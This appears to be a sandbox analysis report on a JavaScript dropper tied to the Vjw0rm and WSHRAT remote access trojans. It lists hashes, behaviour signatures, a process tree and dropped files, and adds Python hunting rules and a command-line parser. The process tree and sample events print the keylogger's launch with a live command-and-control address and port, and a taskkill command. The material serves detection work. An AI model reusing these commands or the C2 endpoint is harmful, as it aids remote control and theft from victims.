Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    01-09-2021 04:44

General

  • Target

    extracted.js

  • Size

    18KB

  • MD5

    1d9327d69fd263ac645b6a4eef31cb24

  • SHA1

    3cff6c8d464e8c254048635dd68e31225ffcb6e4

  • SHA256

    b302998fc5e3ff4a61d22f5c35ea5e168e040d10bc8437cf8c190bfc27e63dd0

  • SHA512

    50cf6ff55a3f73803b4b1313c029e08e66e62ff6de1fd839fec21aecc09d30254616a3b8aab271828a7a69f4835d155ee4af53bb3c4daaa3b4a1cb2305409e2f

Malware Config

Signatures

  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

  • WSHRAT

    WSHRAT is a variant of the Houdini worm and exists in both VBS and JS forms.

  • Blocklisted process makes network request 22 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops startup file 4 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). The sandbox's generic description of this signature calls it likely ransomware behaviour; for a Houdini-family worm such as WSHRAT, enumerating drives is equally consistent with looking for removable media to spread to.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs
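
The signatures above are a sandbox's labels for observed behaviour. The following is an added example, not part of the report or of any detection product, showing how three of those behaviours translate into process-creation hunting rules. The events are constructed Sysmon-style records modelled on this report's process tree (the parent of the first wscript.exe is not shown in the report and is assumed to be explorer.exe); the rule names and the ProcEvent type are hypothetical.

```python
# Added example: process-creation hunting rules for the behaviours the
# sandbox signatures describe. Events are constructed from this report's
# process tree; rule names and the ProcEvent shape are hypothetical.
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# User-writable staging locations used by the dropper in this report.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\(local|roaming)\\", re.I)
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf)\b", re.I)
IPV4_PORT = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\s+\d{1,5}\b")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_image: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule_name, pid) pairs; one event may fire several rules."""
    hits = []
    for e in events:
        img, parent = basename(e.image), basename(e.parent_image)
        cmd = e.cmdline.lower()
        # Rule 1: a script host executing a script staged under %APPDATA% or
        # %LOCALAPPDATA%. //B only suppresses WSH error dialogs, so it is an
        # escalation signal, not the trigger.
        if img in SCRIPT_HOSTS and USER_WRITABLE.search(cmd) and SCRIPT_EXT.search(cmd):
            hits.append(("wsh_script_from_appdata", e.pid))
        # Rule 2: script host -> cmd.exe running taskkill /F (the VBS stage
        # clears an old keylogger instance before starting the dropped one).
        if img == "cmd.exe" and parent in SCRIPT_HOSTS and "taskkill" in cmd and "/f" in cmd.split():
            hits.append(("wsh_spawns_taskkill", e.pid))
        # Rule 3: an EXE in a user-writable path started by a script host with
        # "<ipv4> <port>" on its command line, i.e. the C2 hand-off.
        if parent in SCRIPT_HOSTS and USER_WRITABLE.search(e.image) and IPV4_PORT.search(cmd):
            hits.append(("dropped_exe_with_c2_args", e.pid))
    return hits


# Constructed from the process tree in this report, plus one benign control.
SAMPLE_EVENTS = [
    ProcEvent(4796, r"C:\Windows\system32\wscript.exe",
              r"wscript.exe C:\Users\Admin\AppData\Local\Temp\extracted.js",
              r"C:\Windows\explorer.exe"),  # parent assumed
    ProcEvent(3516, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\amqolYPJMq.js"',
              r"C:\Windows\system32\wscript.exe"),
    ProcEvent(1220, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\XLUWQJIUG1.vbs"',
              r"C:\Windows\system32\wscript.exe"),
    ProcEvent(1680, r"C:\Windows\system32\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c taskkill /F /IM kl-plugin.exe',
              r"C:\Windows\System32\WScript.exe"),
    ProcEvent(1988, r"C:\Windows\system32\taskkill.exe",
              r"taskkill /F /IM kl-plugin.exe",
              r"C:\Windows\system32\cmd.exe"),
    ProcEvent(2208, r"C:\Users\Admin\AppData\Local\Temp\kl-plugin.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\kl-plugin.exe" 194.5.97.156 8256 '
              r'"WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|'
              r'false - 9/1/2021|Visual Basic-v2.0|NL:Netherlands" 1',
              r"C:\Windows\System32\WScript.exe"),
    # Benign control (constructed): a logon script under Program Files.
    ProcEvent(5000, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Program Files\Vendor\logon.vbs"',
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:28s} pid={pid}")
```

Rule 1 also fires on the initial wscript.exe because the sandbox itself stages the sample under %LOCALAPPDATA%\Temp; in production that path is exactly where mail-borne droppers land, so keep the rule broad and tune by parent process rather than by excluding the directory.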

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\extracted.js
    1⤵
    • Blocklisted process makes network request
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4796
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\amqolYPJMq.js"
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Adds Run key to start application
      PID:3516
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\XLUWQJIUG1.vbs"
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1220
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c taskkill /F /IM kl-plugin.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1680
        • C:\Windows\system32\taskkill.exe
          taskkill /F /IM kl-plugin.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1988
      • C:\Users\Admin\AppData\Local\Temp\kl-plugin.exe
        "C:\Users\Admin\AppData\Local\Temp\kl-plugin.exe" 194.5.97.156 8256 "WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 9/1/2021|Visual Basic-v2.0|NL:Netherlands" 1
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:2208
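
The last process in the tree is the WSHRAT hand-off: the VBS stage launches the dropped kl-plugin.exe with the C2 address and port, a "|"-delimited victim profile and a trailing flag. The parser below is an added example, not code from the report or from the malware. The field names it assigns (hwid, hostname, username, os, antivirus, USB-spread flag, install date, version, country) are an assumption based on the Houdini information() routine that WSHRAT inherits, not something the report states.

```python
# Added example: extract the C2 socket and the victim profile from the
# kl-plugin.exe command line in this report. Field names are an assumption
# (Houdini-style profile), not documented by the sandbox.
import json
import re

# Exact command line from the process tree (PID 2208).
KL_PLUGIN_CMDLINE = (
    r'"C:\Users\Admin\AppData\Local\Temp\kl-plugin.exe" 194.5.97.156 8256 '
    r'"WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|'
    r'false - 9/1/2021|Visual Basic-v2.0|NL:Netherlands" 1'
)

# Assumed meaning of each '|'-separated field, in order.
FIELD_NAMES = ("family", "hwid", "hostname", "username", "os", "plus_flag",
               "antivirus", "usb_spread_and_install_date", "version", "country")

CMDLINE_RE = re.compile(
    r'^"(?P<image>[^"]+)"\s+(?P<c2_host>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<c2_port>\d{1,5})\s+'
    r'"(?P<ident>[^"]+)"\s+(?P<flag>\S+)$'
)


def parse_kl_plugin_cmdline(cmdline: str) -> dict:
    """Split '<exe> <ip> <port> "<profile>" <flag>' into a structured record.

    Raises ValueError on anything that does not fit that shape, so a
    near-miss (different argument count, garbage port) is not silently
    reported as a C2 hit.
    """
    m = CMDLINE_RE.match(cmdline)
    if not m:
        raise ValueError("command line does not match the expected WSHRAT plugin form")
    port = int(m["c2_port"])
    if not 0 < port < 65536:
        raise ValueError(f"port out of range: {port}")
    fields = m["ident"].split("|")
    if len(fields) != len(FIELD_NAMES):
        raise ValueError(f"expected {len(FIELD_NAMES)} profile fields, got {len(fields)}")
    profile = dict(zip(FIELD_NAMES, fields))
    # Field 8 carries two values joined by " - ": the USB-spread flag and
    # the infection date (assumed reading of "false - 9/1/2021").
    usb, _, date = profile.pop("usb_spread_and_install_date").partition(" - ")
    profile["usb_spread"] = usb
    profile["install_date"] = date
    return {
        "image": m["image"],
        "c2_host": m["c2_host"],
        "c2_port": port,
        "c2_socket": f"{m['c2_host']}:{port}",
        "trailing_flag": m["flag"],
        "profile": profile,
    }


if __name__ == "__main__":
    print(json.dumps(parse_kl_plugin_cmdline(KL_PLUGIN_CMDLINE), indent=2))
```

The hwid (3ED10BF6) is the value worth pivoting on across reports: in the Houdini lineage it is derived from the system volume serial, so the same victim reinfected by a rebuilt sample reports the same identifier even when the dropped filenames change.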

Network

MITRE ATT&CK Matrix ATT&CK v6

  Tactic            Technique                            Count  ID
  Persistence       Registry Run Keys / Startup Folder   1      T1060
  Defense Evasion   Modify Registry                      1      T1112
  Discovery         System Information Discovery         1      T1082

Downloads

  • C:\Users\Admin\AppData\Local\Temp\XLUWQJIUG1.vbs
    MD5

    e335bd5a685e95d9652d5a600b3605ea

    SHA1

    863cb2c134c72d65138af0da4b4053d5e9d9cfc9

    SHA256

    d0cdcbfd0c9053bf94b6e8a2bdbe2df910833164330013c4ebc5623a2b5215ba

    SHA512

    dba67a7dbabc3a780f0e750ff80817d7ac9b83834c1755ff6b5ddb6541787c16adb2a33d20132184172b37963cd2cf3fced3cbdeaecf09dfbff76c3267f3650f

  • C:\Users\Admin\AppData\Local\Temp\kl-plugin.exe
    MD5

    7099a939fa30d939ccceb2f0597b19ed

    SHA1

    37b644ef5722709cd9024a372db4590916381976

    SHA256

    272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a

    SHA512

    6e179a32b3091beee71d425248ae56495e31e9df569159a93af5826ddef28fba904ae4810d3ca2da45fe6dc8be1eeaecf71e8225b3e605f22f41f4e46d1cf721

  • C:\Users\Admin\AppData\Roaming\amqolYPJMq.js
    MD5

    3f7b92769fc59d8adc125b4d4e8adee4

    SHA1

    b3ea6913dcf3681572a1db1f429cc5e1e49b060e

    SHA256

    e1fccde6528046c2c1e41096085c199efaddc1393d42f6696165aeec43c9a209

    SHA512

    659caad97e885af9d5f2dece465873b517fc34a5c67f5f0aba08b9ef868cca57fe025ed9979bd0933e46ee45792d5b424bd99a24c4449c5b739f17e0b6bdf01f

  • memory/1220-116-0x0000000000000000-mapping.dmp
  • memory/1680-118-0x0000000000000000-mapping.dmp
  • memory/1988-119-0x0000000000000000-mapping.dmp
  • memory/2208-120-0x0000000000000000-mapping.dmp
  • memory/2208-123-0x0000000002710000-0x0000000002711000-memory.dmp
    Filesize

    4KB

  • memory/3516-114-0x0000000000000000-mapping.dmp